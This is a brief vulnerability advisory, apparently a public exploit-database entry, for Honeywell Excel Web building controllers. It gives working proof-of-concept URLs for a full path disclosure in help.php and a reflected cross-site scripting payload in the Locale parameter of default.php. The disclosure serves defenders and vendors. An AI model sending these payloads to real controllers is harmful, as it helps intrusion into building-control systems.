Share
# Honeywell MCR Web Controller  
# Full Path Disclosure & Cross Site Scripting  
  
# Vendor Homepage: https://www.honeywell.com  
# WebVersion:  
XL1000C50 EXCEL WEB 52 I/O,  
XL1000C500 EXCEL WEB 300 I/O,  
XL1000C100 EXCEL WEB 104 I/O,  
XL1000C1000 EXCEL WEB 600 I/O,  
XL1000C50U EXCEL WEB 52 I/O UUKL,  
XL1000C500U EXCEL WEB 300 I/O UUKL,  
XL1000C100U EXCEL WEB 104 I/O UUKL,  
XL1000C1000U EXCEL WEB 600 I/O UUKL.  
  
# Tested on: EXCEL WEB - AIT AG XL1000C1000U  
600 I/O UUKL - 05.03.2008  
  
# Date: Nov 09, 2019  
# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>  
  
# Full Path Disclosure  
http://<excel-web.host>/standard/login/help.php  
http://<excel-web.host>/standard/login/help.php?Locale=1033&ID[]=0  
  
# Cross Site Scripting  
http://  
<excel-web.host>/standard/default.php?Locale=%22%3C/script%3E%3Ch1%3EXSS%3C/%22